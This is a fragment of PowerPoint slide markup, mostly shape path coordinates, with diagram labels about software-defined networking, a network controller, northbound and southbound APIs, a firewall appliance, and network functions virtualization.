                    <a:pt x="3905278" y="1000816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3864507" y="1018028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3819144" y="1024127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170688" y="1024127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125324" y="1018028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84553" y="1000816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50006" y="974121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23311" y="939574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6099" y="898803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="853439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="170687"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="2857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3067304" y="4039616"/>
            <a:ext cx="142113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3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policy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819066" y="3709606"/>
            <a:ext cx="4017010" cy="1052830"/>
            <a:chOff x="10819066" y="3709606"/>
            <a:chExt cx="4017010" cy="1052830"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="object 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10833354" y="3723894"/>
              <a:ext cx="3988435" cy="1024255"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3988434" h="1024254">
                  <a:moveTo>
                    <a:pt x="3817619" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="170688" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125324" y="6099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84553" y="23311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50006" y="50006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23311" y="84553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6099" y="125324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="170687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="853439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6099" y="898803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23311" y="939574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50006" y="974121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84553" y="1000816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125324" y="1018028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170688" y="1024127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3817619" y="1024127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3862983" y="1018028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3903754" y="1000816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3938301" y="974121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3964996" y="939574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3982208" y="898803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3988307" y="853439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3988307" y="170687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3982208" y="125324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3964996" y="84553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3938301" y="50006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3903754" y="23311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3862983" y="6099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3817619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833354" y="3723894"/>
              <a:ext cx="3988435" cy="1024255"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3988434" h="1024254">
                  <a:moveTo>
                    <a:pt x="0" y="170687"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6099" y="125324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23311" y="84553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50006" y="50006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84553" y="23311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125324" y="6099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170688" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3817619" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3862983" y="6099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3903754" y="23311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3938301" y="50006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3964996" y="84553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3982208" y="125324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3988307" y="170687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3988307" y="853439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3982208" y="898803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3964996" y="939574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3938301" y="974121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3903754" y="1000816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3862983" y="1018028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3817619" y="1024127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170688" y="1024127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125324" y="1018028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84553" y="1000816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50006" y="974121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23311" y="939574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6099" y="898803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="853439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="170687"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="2857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1614150" y="4039616"/>
            <a:ext cx="24765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Ne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work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cont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oller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824150" y="5175694"/>
            <a:ext cx="4018915" cy="1051560"/>
            <a:chOff x="8824150" y="5175694"/>
            <a:chExt cx="4018915" cy="1051560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="object 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8838438" y="5189982"/>
              <a:ext cx="3990340" cy="1022985"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3990340" h="1022985">
                  <a:moveTo>
                    <a:pt x="3819397" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="170433" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125133" y="6089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84422" y="23273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49926" y="49926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23273" y="84422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6089" y="125133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="170433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="852169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6089" y="897470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23273" y="938181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49926" y="972677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84422" y="999330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125133" y="1016514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170433" y="1022603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3819397" y="1022603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3864698" y="1016514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3905409" y="999330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3939905" y="972677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3966558" y="938181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3983742" y="897470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989831" y="852169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989831" y="170433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3983742" y="125133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3966558" y="84422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3939905" y="49926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3905409" y="23273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3864698" y="6089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3819397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838438" y="5189982"/>
              <a:ext cx="3990340" cy="1022985"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3990340" h="1022985">
                  <a:moveTo>
                    <a:pt x="0" y="170433"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6089" y="125133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23273" y="84422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49926" y="49926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84422" y="23273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125133" y="6089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170433" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3819397" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3864698" y="6089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3905409" y="23273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3939905" y="49926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3966558" y="84422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3983742" y="125133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989831" y="170433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989831" y="852169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3983742" y="897470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3966558" y="938181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3939905" y="972677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3905409" y="999330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3864698" y="1016514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3819397" y="1022603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170433" y="1022603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125133" y="1016514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84422" y="999330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49926" y="972677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23273" y="938181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6089" y="897470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="852169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="170433"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="2857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9788143" y="5505958"/>
            <a:ext cx="213804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Southbou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API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285678" y="5175694"/>
            <a:ext cx="4018915" cy="1051560"/>
            <a:chOff x="4285678" y="5175694"/>
            <a:chExt cx="4018915" cy="1051560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="object 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4299965" y="5189982"/>
              <a:ext cx="3990340" cy="1022985"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3990340" h="1022985">
                  <a:moveTo>
                    <a:pt x="3819398" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="170434" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125133" y="6089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84422" y="23273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49926" y="49926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23273" y="84422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6089" y="125133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="170433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="852169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6089" y="897470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23273" y="938181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49926" y="972677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84422" y="999330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125133" y="1016514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170434" y="1022603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3819398" y="1022603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3864698" y="1016514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3905409" y="999330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3939905" y="972677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3966558" y="938181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3983742" y="897470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989832" y="852169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989832" y="170433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3983742" y="125133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3966558" y="84422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3939905" y="49926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3905409" y="23273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3864698" y="6089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3819398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299965" y="5189982"/>
              <a:ext cx="3990340" cy="1022985"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3990340" h="1022985">
                  <a:moveTo>
                    <a:pt x="0" y="170433"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6089" y="125133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23273" y="84422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49926" y="49926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84422" y="23273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125133" y="6089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170434" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3819398" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3864698" y="6089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3905409" y="23273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3939905" y="49926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3966558" y="84422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3983742" y="125133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989832" y="170433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989832" y="852169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3983742" y="897470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3966558" y="938181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3939905" y="972677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3905409" y="999330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3864698" y="1016514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3819398" y="1022603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170434" y="1022603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125133" y="1016514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84422" y="999330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49926" y="972677"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23273" y="938181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6089" y="897470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="852169"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="170433"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="2857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5142357" y="5505958"/>
            <a:ext cx="235331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Firewall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appliance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52777" y="1882292"/>
            <a:ext cx="13354685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58490" marR="5080" indent="-3145790">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Software-Defined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Networking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(SDN)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application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used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define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policy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decisions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control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pla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.</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="2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component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3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ca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see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below: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280594" y="3709606"/>
            <a:ext cx="4018915" cy="1052830"/>
            <a:chOff x="6280594" y="3709606"/>
            <a:chExt cx="4018915" cy="1052830"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="object 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6294882" y="3723894"/>
              <a:ext cx="3990340" cy="1024255"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3990340" h="1024254">
                  <a:moveTo>
                    <a:pt x="3819143" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="170687" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125324" y="6099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84553" y="23311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50006" y="50006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23311" y="84553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6099" y="125324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="170687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="853439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6099" y="898803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23311" y="939574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50006" y="974121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84553" y="1000816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125324" y="1018028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170687" y="1024127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3819143" y="1024127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3864507" y="1018028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3905278" y="1000816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3939825" y="974121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3966520" y="939574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3983732" y="898803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989832" y="853439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989832" y="170687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3983732" y="125324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3966520" y="84553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3939825" y="50006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3905278" y="23311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3864507" y="6099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3819143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294882" y="3723894"/>
              <a:ext cx="3990340" cy="1024255"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3990340" h="1024254">
                  <a:moveTo>
                    <a:pt x="0" y="170687"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6099" y="125324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23311" y="84553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50006" y="50006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84553" y="23311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125324" y="6099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170687" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3819143" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3864507" y="6099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3905278" y="23311"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3939825" y="50006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3966520" y="84553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3983732" y="125324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989832" y="170687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3989832" y="853439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3983732" y="898803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3966520" y="939574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3939825" y="974121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3905278" y="1000816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3864507" y="1018028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3819143" y="1024127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170687" y="1024127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125324" y="1018028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84553" y="1000816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50006" y="974121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23311" y="939574"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6099" y="898803"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="853439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="170687"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="2857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7245477" y="4039616"/>
            <a:ext cx="213741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No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thboun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API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80742" y="7160818"/>
            <a:ext cx="13346430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770755" marR="5080" indent="-4758690">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Network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Functions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Virtualization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(NFV)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supports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rapid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deployment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virtual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networking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using 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general-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purpose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VMs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containers.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54115" y="306451"/>
            <a:ext cx="474599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90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Software-Defined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65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visibility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02708" y="760476"/>
            <a:ext cx="6408420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299535" y="4472940"/>
            <a:ext cx="5751195" cy="3535679"/>
            <a:chOff x="5299535" y="4472940"/>
            <a:chExt cx="5751195" cy="3535679"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5299535" y="4788693"/>
              <a:ext cx="5751195" cy="3220085"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5751195" h="3220084">
                  <a:moveTo>
                    <a:pt x="2874438" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2846062" y="7072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2833163" y="28289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2833163" y="1861788"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2782076" y="1862129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2731178" y="1863153"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2680467" y="1864859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2629945" y="1867249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2579611" y="1870321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2529464" y="1874076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2479506" y="1878514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2429735" y="1883635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2380152" y="1889440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2330756" y="1895927"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2281548" y="1903098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2232528" y="1910953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2183695" y="1919491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2135049" y="1928712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2086590" y="1938617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2038318" y="1949206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1990234" y="1960479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1942336" y="1972435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1894625" y="1985076"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1847101" y="1998401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1799764" y="2012410"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="738806" y="1108297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="726354" y="1101224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="711295" y="1098867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696212" y="1101224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683688" y="1108297"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="675973" y="1126886"/>
                  </a:lnTo>
                  <a:lnTo>
